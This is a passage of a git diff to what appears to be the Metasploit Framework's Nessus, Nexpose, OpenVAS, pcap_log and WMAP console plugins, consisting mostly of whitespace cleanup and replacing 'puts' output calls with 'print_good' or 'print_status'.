print_status(" use nessus_scan_status to list all available scans")
return
end
-
+
pause = @n.scan_stop(sid)
-
+
print_status("#{sid} has been stopped")
end
-
+
def cmd_nessus_scan_stop_all(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_stop_all")
@@ -1318,18 +1316,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
pause = @n.scan_stop_all
-
+
print_status("All scans have been stopped")
end
-
+
def cmd_nessus_scan_resume_all(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_resume_all")
@@ -1339,18 +1337,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
pause = @n.scan_resume_all
-
+
print_status("All scans have been resumed")
end
-
+
def cmd_nessus_user_add(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_add ")
@@ -1360,16 +1358,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 2
user = args[0]
@@ -1380,7 +1378,7 @@ module Msf
print_status(" Only adds non admin users")
return
end
-
+
u = @n.users_list
u.each { |stuff|
if stuff['name'] == user
@@ -1396,9 +1394,9 @@ module Msf
print_error("#{user} was not added")
end
end
-
+
def cmd_nessus_user_del(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_del ")
@@ -1408,16 +1406,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 1
user = args[0]
@@ -1427,7 +1425,7 @@ module Msf
print_status(" Only dels non admin users")
return
end
-
+
del = @n.user_del(user)
status = del.root.elements['status'].text
if status == "OK"
@@ -1436,9 +1434,9 @@ module Msf
print_error("#{user} was not deleted")
end
end
-
+
def cmd_nessus_user_passwd(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_passwd ")
@@ -1448,16 +1446,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 2
user = args[0]
@@ -1468,7 +1466,7 @@ module Msf
print_status(" User list from nessus_user_list")
return
end
-
+
pass = @n.user_pass(user,pass)
status = pass.root.elements['status'].text
if status == "OK"
@@ -1477,9 +1475,9 @@ module Msf
print_error("#{user}'s password has not been changed")
end
end
-
+
def cmd_nessus_admin(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_admin")
@@ -1489,20 +1487,20 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
else
print_good("Your Nessus user is an admin")
end
end
-
+
def cmd_nessus_plugin_family(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_family ")
@@ -1512,11 +1510,11 @@ module Msf
print_status("use nessus_plugin_list to list all plugins")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
fam = args[0]
@@ -1526,27 +1524,26 @@ module Msf
print_status(" list all plugins from a Family from nessus_plugin_list")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Plugin ID',
'Plugin Name',
'Plugin File Name'
])
-
+
family = @n.plugin_family(fam)
-
+
family.each {|plugin|
tbl << [ plugin['id'], plugin['name'], plugin['filename'] ]
}
print_good("#{fam} Info")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_policy_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_policy_list")
@@ -1555,14 +1552,13 @@ module Msf
print_status("Lists all policies on the server")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'ID',
'Name',
'Comments'
@@ -1572,12 +1568,12 @@ module Msf
tbl << [ policy['id'], policy['name'], policy['comments'] ]
}
print_good("Nessus Policy List")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_policy_del(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_policy_del ")
@@ -1587,16 +1583,16 @@ module Msf
print_status("use nessus_policy_list to list all policies")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 1
pid = args[0]
@@ -1606,9 +1602,8 @@ module Msf
print_status(" nessus_policy_list to find the id.")
return
end
-
+
print_error("Are you sure you want to delete #{pid} ?")
- $stdout.flush
answer = gets
answer.chomp!
if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes"
@@ -1623,9 +1618,9 @@ module Msf
print_error("wow that was close, damn we asked")
end
end
-
+
def cmd_nessus_plugin_details(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_details ")
@@ -1635,11 +1630,11 @@ module Msf
print_status("use nessus_plugin_list to list all plugins")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 1
pname = args[0]
@@ -1649,14 +1644,13 @@ module Msf
print_status(" nessus_plugin_list and then nessus_plugin_family to find the plugin file name.")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'',
''
])
-
+
entry = @n.plugin_detail(pname)
print_good("Plugin Details for #{entry['name']}")
tbl << [ "Plugin ID", entry['id'] ]
@@ -1673,12 +1667,12 @@ module Msf
tbl << [ "Solution", entry['solution'] ]
tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ]
tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ]
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_report_del(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_del ")
@@ -1688,16 +1682,16 @@ module Msf
print_status("use nessus_report_list to list all reports")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
case args.length
when 1
rid = args[0]
@@ -1707,9 +1701,8 @@ module Msf
print_status(" nessus_report_list to find the id.")
return
end
-
+
print_error("Are you sure you want to delete #{rid} ?")
- $stdout.flush
answer = gets
answer.chomp!
if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes")
@@ -1723,12 +1716,12 @@ module Msf
else
print_error("wow that was close, damn we asked")
end
-
-
+
+
end
-
+
def cmd_nessus_server_prefs(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_prefs")
@@ -1737,19 +1730,18 @@ module Msf
print_status("Returns a long list of server prefs.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Name',
'Value'
])
@@ -1758,13 +1750,13 @@ module Msf
tbl << [ pref['name'], pref['value'] ]
}
print_good("Nessus Server Pref List")
- puts "\n"
- puts tbl.to_s + "\n"
-
+ print_good "\n"
+ print_good tbl.to_s + "\n"
+
end
-
+
def cmd_nessus_plugin_prefs(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_prefs")
@@ -1773,19 +1765,18 @@ module Msf
print_status("Returns a long list of plugin prefs.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Name',
'Value',
'Type'
@@ -1795,11 +1786,11 @@ module Msf
tbl << [ pref['prefname'], pref['prefvalues'], pref['preftype'] ]
}
print_good("Nessus Plugins Pref List")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
end
-
+
def initialize(framework, opts)
super
diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb
index ced99dc51a..d53d01740d 100644
--- a/plugins/nexpose.rb
+++ b/plugins/nexpose.rb
@@ -566,44 +566,44 @@ class Plugin::Nexpose < Msf::Plugin
end
end
- #
- # Nexpose vuln lookup
- #
- def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil)
- doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef|
-
- title = vulndef.attributes['title']
- pciSeverity = vulndef.attributes['pciSeverity']
- cvss_score = vulndef.attributes['cvssScore']
- cvss_vector = vulndef.attributes['cvssVector']
-
- vulndef.elements['references'].elements.each('reference') do |ref|
- if ref.attributes['source'] == 'BID'
- refs[ 'BID-' + ref.text ] = true
- elsif ref.attributes['source'] == 'CVE'
- # ref.text is CVE-$ID
- refs[ ref.text ] = true
- elsif ref.attributes['source'] == 'MS'
- refs[ 'MSB-MS-' + ref.text ] = true
- end
- end
-
- refs[ 'NEXPOSE-' + vid.downcase ] = true
-
- vuln = framework.db.find_or_create_vuln(
+ #
+ # Nexpose vuln lookup
+ #
+ def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil)
+ doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef|
+
+ title = vulndef.attributes['title']
+ pciSeverity = vulndef.attributes['pciSeverity']
+ cvss_score = vulndef.attributes['cvssScore']
+ cvss_vector = vulndef.attributes['cvssVector']
+
+ vulndef.elements['references'].elements.each('reference') do |ref|
+ if ref.attributes['source'] == 'BID'
+ refs[ 'BID-' + ref.text ] = true
+ elsif ref.attributes['source'] == 'CVE'
+ # ref.text is CVE-$ID
+ refs[ ref.text ] = true
+ elsif ref.attributes['source'] == 'MS'
+ refs[ 'MSB-MS-' + ref.text ] = true
+ end
+ end
+
+ refs[ 'NEXPOSE-' + vid.downcase ] = true
+
+ vuln = framework.db.find_or_create_vuln(
:host => host,
:service => serv,
:name => 'NEXPOSE-' + vid.downcase,
:data => title)
-
- rids = []
- refs.keys.each do |r|
- rids << framework.db.find_or_create_ref(:name => r)
- end
-
- vuln.refs << (rids - vuln.refs)
- end
- end
+
+ rids = []
+ refs.keys.each do |r|
+ rids << framework.db.find_or_create_ref(:name => r)
+ end
+
+ vuln.refs << (rids - vuln.refs)
+ end
+ end
end
diff --git a/plugins/openvas.rb b/plugins/openvas.rb
index f856006962..46722a58df 100644
--- a/plugins/openvas.rb
+++ b/plugins/openvas.rb
@@ -3,7 +3,10 @@
# This plugin provides integration with OpenVAS. Written by kost and
# averagesecurityguy.
#
-# Distributed under MIT license:
+# $Id$
+# $Revision$
+#
+# Distributed under MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
@@ -34,7 +37,7 @@ class Plugin::OpenVAS < Msf::Plugin
'openvas_task_pause' => "Pause task by ID",
'openvas_task_resume' => "Resume task by ID",
'openvas_task_resume_or_start' => "Resume task or start task by ID",
-
+
'openvas_target_create' => "Create target (name, hosts, comment)",
'openvas_target_delete' => "Delete target by ID",
'openvas_target_list' => "Display list of targets",
@@ -43,7 +46,7 @@ class Plugin::OpenVAS < Msf::Plugin
'openvas_format_list' => "Display list of available report formats",
- 'openvas_report_list' => "Display a list of available report formats",
+ 'openvas_report_list' => "Display a list of available report formats",
'openvas_report_delete' => "Delete a report specified by ID",
'openvas_report_download' => "Save a report to disk",
'openvas_report_import' => "Import report specified by ID into framework",
@@ -172,7 +175,7 @@ class Plugin::OpenVAS < Msf::Plugin
# Make sure the correct number of arguments are present.
if args?(args, 4, 5)
-
+
user, pass, host, port, sslv = args
# SSL warning. User is required to confirm.
@@ -199,10 +202,10 @@ class Plugin::OpenVAS < Msf::Plugin
else
print_status("Usage:")
- print_status("openvas_connect username password host port ")
+ print_status("openvas_connect username password host port ")
end
end
-
+
# Disconnect from an OpenVAS manager
def cmd_openvas_disconnect()
return unless openvas?
@@ -216,7 +219,7 @@ class Plugin::OpenVAS < Msf::Plugin
#--------------------------
def cmd_openvas_target_create(*args)
return unless openvas?
-
+
if args?(args, 3)
begin
resp = @ov.target_create(args[0], args[1], args[2])
@@ -255,13 +258,14 @@ class Plugin::OpenVAS < Msf::Plugin
'Columns' => ["ID", "Name", "Hosts", "Max Hosts", "In Use", "Comment"])
id = 0
@ov.target_get_all().each do |target|
- tbl << [ id, target["name"], target["hosts"], target["max_hosts"],
- target["in_use"], target["comment"] ]
+ tbl << [ id, target["name"], target["hosts"], target["max_hosts"],
+ target["in_use"], target["comment"] ]
id += 1
end
print_good("OpenVAS list of targets")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -324,8 +328,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of tasks")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -415,15 +420,16 @@ class Plugin::OpenVAS < Msf::Plugin
begin
tbl = Rex::Ui::Text::Table.new(
'Columns' => [ "ID", "Name" ])
-
+
id = 0
@ov.configs.each do |config|
tbl << [ id, config["name"] ]
id += 1
end
print_good("OpenVAS list of configs")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -444,8 +450,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of report formats")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -466,8 +473,9 @@ class Plugin::OpenVAS < Msf::Plugin
id += 1
end
print_good("OpenVAS list of reports")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s
+ print_good "\n"
rescue OpenVASOMP::OMPError => e
print_error(e.to_s)
end
@@ -508,7 +516,7 @@ class Plugin::OpenVAS < Msf::Plugin
print_status("Usage: openvas_report_download ")
end
end
-
+
def cmd_openvas_report_import(*args)
return unless openvas?
@@ -523,7 +531,7 @@ class Plugin::OpenVAS < Msf::Plugin
else
print_status("Usage: openvas_report_import ")
print_status("Only the NBE format is supported for importing.")
- end
+ end
end
end # End OpenVAS class
diff --git a/plugins/pcap_log.rb b/plugins/pcap_log.rb
index 496e75abad..c7bf8e368e 100644
--- a/plugins/pcap_log.rb
+++ b/plugins/pcap_log.rb
@@ -37,7 +37,7 @@ class Plugin::PcapLog < Msf::Plugin
"pcap_iface" => "Set/Get an interface to capture from",
"pcap_start" => "Start a capture",
"pcap_stop" => "Stop a running capture",
-
+
"pcap_show_config" => "Show the current PcapLog configuration"
}
end
@@ -59,7 +59,7 @@ class Plugin::PcapLog < Msf::Plugin
def cmd_pcap_iface(*args)
@iface = args[0] || @iface
- print_line "#{self.name} Interface: #{@iface}"
+ print_line "#{self.name} Interface: #{@iface}"
end
def cmd_pcap_start(*args)
@@ -94,7 +94,7 @@ class Plugin::PcapLog < Msf::Plugin
print_line "Capture Stats: #{@pcap.stats.inspect}"
@pcap = nil
@capture_file.close if @capture_file.respond_to? :close
- @capture_thread.kill
+ @capture_thread.kill
@capture_thread = nil
else
print_error "No capture running."
@@ -124,7 +124,7 @@ class Plugin::PcapLog < Msf::Plugin
return [false, msg]
end
- # Check directory suitability.
+ # Check directory suitability.
unless File.directory? @dir
msg = "Invalid pcap directory specified: '#{@dir}'"
return [false, msg]
@@ -170,7 +170,7 @@ class Plugin::PcapLog < Msf::Plugin
end
end
-
+
def initialize(framework, opts)
super
add_console_dispatcher(PcapLogDispatcher)
diff --git a/plugins/wmap.rb b/plugins/wmap.rb
index 12b4a1f796..010e2140f7 100644
--- a/plugins/wmap.rb
+++ b/plugins/wmap.rb
@@ -12,9 +12,9 @@ module Msf
class Plugin::Wmap < Msf::Plugin
class WmapCommandDispatcher
-
+
attr_accessor :targets
-
+
include Msf::Ui::Console::CommandDispatcher
def name
@@ -37,12 +37,12 @@ class Plugin::Wmap < Msf::Plugin
while (arg = args.shift)
case arg
- when '-c'
- self.targets = {}
+ when '-c'
+ self.targets = {}
when '-l'
view_targets
return
- when '-t'
+ when '-t'
process_urls(args.shift)
when '-h'
print_status("Usage: wmap_targets [options]")
@@ -50,7 +50,7 @@ class Plugin::Wmap < Msf::Plugin
print_line("\t-t [urls] Define target sites (vhost1,url[space]vhost2,url) ")
print_line("\t-c Clean target sites list")
print_line("\t-l List all target sites")
-
+
print_line("")
return
else
@@ -59,7 +59,7 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
-
+
def cmd_wmap_sites(*args)
args.push("-h") if args.length == 0
@@ -68,10 +68,10 @@ class Plugin::Wmap < Msf::Plugin
when '-a'
s = add_web_site(args.shift)
if s
- print_status("Site created.")
+ print_status("Site created.")
else
print_error("Unable to create site")
- end
+ end
when '-l'
view_sites
return
@@ -79,7 +79,7 @@ class Plugin::Wmap < Msf::Plugin
u = args.shift
l = args.shift
s = args.shift
-
+
if l == nil or l.empty?
l = 200
s = true
@@ -87,16 +87,16 @@ class Plugin::Wmap < Msf::Plugin
l = l.to_i
s = false
end
-
+
view_site_tree(u,l,s)
- return
+ return
when '-h'
print_status("Usage: wmap_sites [options]")
print_line("\t-h Display this help text")
print_line("\t-a [url] Add site (vhost,url)")
print_line("\t-l List all available sites")
print_line("\t-s [urls] (level) Display site structure (vhost,url)")
-
+
print_line("")
return
else
@@ -105,7 +105,7 @@ class Plugin::Wmap < Msf::Plugin
end
end
end
-
+
def cmd_wmap_run(*args)
# Run exploit check
wmap_check = true
@@ -113,7 +113,7 @@ class Plugin::Wmap < Msf::Plugin
wmap_runexpl = false
# Exit wmap if session is created
wmap_exitifsess = true
-
+
# Formating
sizeline = 60
@@ -122,38 +122,38 @@ class Plugin::Wmap < Msf::Plugin
# Exclude files can be modified by setting datastore['WMAP_EXCLUDE']
wmap_exclude_files = '.*\.(gif|jpg|png*)$'
-
+
run_wmap_ssl = true
run_wmap_server = true
run_wmap_dir_file = true
run_wmap_query = true
run_wmap_unique_query = true
run_wmap_generic = true
-
+
# If module supports datastore['VERBOSE']
moduleverbose = false
-
+
showprogress = false
-
+
if not run_wmap_ssl
print_status("Loading of wmap ssl modules disabled.")
end
if not run_wmap_server
print_status("Loading of wmap server modules disabled.")
- end
- if not run_wmap_dir_file
+ end
+ if not run_wmap_dir_file
print_status("Loading of wmap dir and file modules disabled.")
end
if not run_wmap_query
print_status("Loading of wmap query modules disabled.")
- end
- if not run_wmap_unique_query
+ end
+ if not run_wmap_unique_query
print_status("Loading of wmap unique query modules disabled.")
- end
- if not run_wmap_generic
+ end
+ if not run_wmap_generic
print_status("Loading of wmap generic modules disabled.")
- end
-
+ end
+
stamp = Time.now.to_f
mode = 0
@@ -203,7 +203,7 @@ class Plugin::Wmap < Msf::Plugin
print_status("Using module #{mname}.")
end
using_m = true
-
+
when '-h'
print_status("Usage: wmap_run [options]")
print_line("\t-h Display this help text")
@@ -220,30 +220,30 @@ class Plugin::Wmap < Msf::Plugin
print_error("Targets have not been selected.")
return
end
-
- if self.targets.keys.length == 0
+
+ if self.targets.keys.length == 0
print_error("Targets have not been selected.")
return
end
-
+
self.targets.each_with_index do |t, idx|
selected_host = t[1][:host]
selected_port = t[1][:port]
selected_ssl = t[1][:ssl]
selected_vhost = t[1][:vhost]
-
+
print_status ("Testing target:")
print_status ("\tSite: #{selected_vhost} (#{selected_host})")
print_status ("\tPort: #{selected_port} SSL: #{selected_ssl}")
- puts '='* sizeline
+ print_status '='* sizeline
print_status("Testing started. #{(Time.now )}")
-
-
+
+
if not selected_ssl
run_wmap_ssl = false
#print_status ("Target is not SSL. SSL modules disabled.")
end
-
+
# WMAP_DIR, WMAP_FILE
matches = {}
@@ -252,7 +252,7 @@ class Plugin::Wmap < Msf::Plugin
# WMAP_QUERY
matches2 = {}
-
+
# WMAP_SSL
matches3 = {}
@@ -279,7 +279,7 @@ class Plugin::Wmap < Msf::Plugin
if penabled
#if ( not using_p or eprofile.include? n.split('/').last ) or (using_m and n.match(mname))
- if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p)
+ if ( using_p and eprofile.include? n.split('/').last ) or (using_m and n.to_s.match(mname)) or (not using_m and not using_p)
#
# First run the WMAP_SERVER plugins
#
@@ -307,7 +307,7 @@ class Plugin::Wmap < Msf::Plugin
when :WMAP_SSL
if run_wmap_ssl
matches3[[selected_host,selected_port,selected_ssl,selected_vhost,mtype[1]+'/'+n]]=true
- end
+ end
else
# Black Hole
end
@@ -321,14 +321,14 @@ class Plugin::Wmap < Msf::Plugin
# Handle modules that need to be run before all tests IF SERVER is SSL, once usually again the SSL web server.
# :WMAP_SSL
#
-
- puts "\n=[ SSL testing ]="
- puts "=" * sizeline
-
+
+ print_status "\n=[ SSL testing ]="
+ print_status "=" * sizeline
+
if not selected_ssl
print_status ("Target is not SSL. SSL modules disabled.")
end
-
+
idx = 0
matches3.each_key do |xref|
idx += 1
@@ -377,7 +377,7 @@ class Plugin::Wmap < Msf::Plugin
mod.datastore['VHOST'] = xref[3].to_s
mod.datastore['VERBOSE'] = moduleverbose
mod.datastore['ShowProgress'] = showprogress
-
+
#
# Run the plugins that only need to be
# launched once.
@@ -386,7 +386,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_SSL
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -490,14 +490,14 @@ class Plugin::Wmap < Msf::Plugin
end
end
-
+
#
# Handle modules that need to be run before all tests, once usually again the web server.
# :WMAP_SERVER
#
- puts "\n=[ Web Server testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ Web Server testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches1.each_key do |xref|
idx += 1
@@ -555,7 +555,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_SERVER
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -663,9 +663,9 @@ class Plugin::Wmap < Msf::Plugin
# Handle modules to be run at every path/file
# WMAP_DIR, WMAP_FILE
#
- puts "\n=[ File/Dir testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ File/Dir testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches.each_key do |xref|
idx += 1
@@ -716,13 +716,13 @@ class Plugin::Wmap < Msf::Plugin
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
-
- puts "Module #{xref[4]}:"
-
+
+ print_status "Module #{xref[4]}:"
+
test_tree = load_tree(w)
test_tree.each do |node|
-
- p = node.current_path
+
+ p = node.current_path
testpath = Pathname.new(p)
strpath = testpath.cleanpath(false).to_s
@@ -830,9 +830,9 @@ class Plugin::Wmap < Msf::Plugin
# Run modules for each request to play with URI with UNIQUE query parameters.
# WMAP_UNIQUE_QUERY
#
- puts "\n=[ Unique Query testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ Unique Query testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches5.each_key do |xref|
idx += 1
@@ -881,50 +881,50 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
utest_query = {}
-
+
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
-
+
w.web_forms.each do |form|
#
# Only test unique query strings by comparing signature to previous tested signatures 'path,p1,p2,pn'
#
-
+
datastr = ""
- typestr = ""
-
+ typestr = ""
+
temparr = []
-
- #puts "---------"
- #puts form.params
- #puts "+++++++++"
-
+
+ #print_status "---------"
+ #print_status form.params
+ #print_status "+++++++++"
+
form.params.each do |p|
pn, pv, pt = p
temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s)
end
-
- datastr = temparr.join("&") if (temparr and not temparr.empty?)
-
+
+ datastr = temparr.join("&") if (temparr and not temparr.empty?)
+
if (utest_query.has_key?(mod.signature(form.path,datastr)) == false)
-
+
mod.datastore['METHOD'] = form.method.upcase
mod.datastore['PATH'] = form.path
mod.datastore['QUERY'] = form.query
if form.method.upcase == 'GET'
mod.datastore['QUERY'] = datastr
- mod.datastore['DATA'] = ""
- end
+ mod.datastore['DATA'] = ""
+ end
mod.datastore['DATA'] = datastr if form.method.upcase == 'POST'
mod.datastore['TYPES'] = typestr
-
+
#
# TODO: Add headers, etc.
#
if wtype == :WMAP_UNIQUE_QUERY
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -953,7 +953,7 @@ class Plugin::Wmap < Msf::Plugin
# Unique query tested, actually the value does not matter
#
#print_status("sig: #{mod.signature(form.path,varnarr.join(','))}")
-
+
utest_query[mod.signature(form.path,datastr)]=1
else
#print_status("Already tested")
@@ -972,9 +972,9 @@ class Plugin::Wmap < Msf::Plugin
# and will make this shotgun implementation much simple.
# WMAP_QUERY
#
- puts "\n=[ Query testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ Query testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches2.each_key do |xref|
idx += 1
@@ -1026,37 +1026,37 @@ class Plugin::Wmap < Msf::Plugin
h = self.framework.db.workspace.hosts.find_by_address(selected_host)
s = h.services.find_by_port(selected_port)
w = s.web_sites.find_by_vhost(selected_vhost)
-
+
w.web_forms.each do |req|
-
+
datastr = ""
- typestr = ""
-
+ typestr = ""
+
temparr = []
-
+
req.params.each do |p|
pn, pv, pt = p
temparr << Rex::Text.uri_encode(pn.to_s) + "=" + Rex::Text.uri_encode(pv.to_s)
end
-
- datastr = temparr.join("&") if (temparr and not temparr.empty?)
-
+
+ datastr = temparr.join("&") if (temparr and not temparr.empty?)
+
mod.datastore['METHOD'] = req.method.upcase
mod.datastore['PATH'] = req.path
if req.method.upcase == 'GET'
mod.datastore['QUERY'] = datastr
- mod.datastore['DATA'] = ""
- end
+ mod.datastore['DATA'] = ""
+ end
mod.datastore['DATA'] = datastr if req.method.upcase == 'POST'
mod.datastore['TYPES'] = typestr
-
-
+
+
#
# TODO: Add method, headers, etc.
#
if wtype == :WMAP_QUERY
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -1087,16 +1087,16 @@ class Plugin::Wmap < Msf::Plugin
print_status(" >> Exception from #{xref[4]}: #{$!}")
end
end
-
+
#
# Handle modules that need to be after all tests, once.
# Good place to have modules that analize the test results and/or
# launch exploits.
# :WMAP_GENERIC
#
- puts "\n=[ General testing ]="
- puts "=" * sizeline
-
+ print_status "\n=[ General testing ]="
+ print_status "=" * sizeline
+
idx = 0
matches10.each_key do |xref|
idx += 1
@@ -1146,7 +1146,7 @@ class Plugin::Wmap < Msf::Plugin
wtype = mod.wmap_type
if wtype == :WMAP_GENERIC
- puts "Module #{xref[4]}"
+ print_status "Module #{xref[4]}"
# To run check function for modules that are exploits
if mod.respond_to?("check") and wmap_check
@@ -1159,7 +1159,7 @@ class Plugin::Wmap < Msf::Plugin
print_status(" >> Exception during check launch from #{xref[4]}: #{$!}")
end
else
-
+
begin
session = mod.run_simple(
'LocalInput' => driver.input,
@@ -1180,22 +1180,22 @@ class Plugin::Wmap < Msf::Plugin
if (mode & wmap_show != 0)
print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds.")
print_status("Done.")
- puts "+" * sizeline
- puts "\n"
+ print_status "+" * sizeline
+ print_status "\n"
end
end
# EOM
- end
-
+ end
+
def view_targets
if self.targets == nil or self.targets.keys.length == 0
print_status "No targets have been defined"
return
end
-
+
indent = ' '
-
+
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => 'Defined targets',
@@ -1213,12 +1213,12 @@ class Plugin::Wmap < Msf::Plugin
tbl << [ idx.to_s, t[1][:vhost], t[1][:host], t[1][:port], t[1][:ssl], t[1][:path].to_s ]
}
- puts tbl.to_s + "\n"
+ print_status tbl.to_s + "\n"
end
-
+
def view_sites
indent = ' '
-
+
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => 'Available sites',
@@ -1232,11 +1232,11 @@ class Plugin::Wmap < Msf::Plugin
'# Forms',
])
- idx = 0
+ idx = 0
self.framework.db.hosts.each do |bdhost|
bdhost.services.each do |serv|
serv.web_sites.each do |web|
- c = web.web_pages.count
+ c = web.web_pages.count
f = web.web_forms.count
tbl << [ idx.to_s, bdhost.address, web.vhost, serv.port, c.to_s, f.to_s ]
idx += 1
@@ -1244,23 +1244,23 @@ class Plugin::Wmap < Msf::Plugin
end
end
- puts tbl.to_s + "\n"
+ print_status tbl.to_s + "\n"
end
-
-
+
+
# Reusing code from hdmoore
#
# Allow the URL to be supplied as VHOST,URL if a custom VHOST
# should be used. This allows for things like:
# localhost,http://192.168.0.2/admin/
-
+
def add_web_site(url)
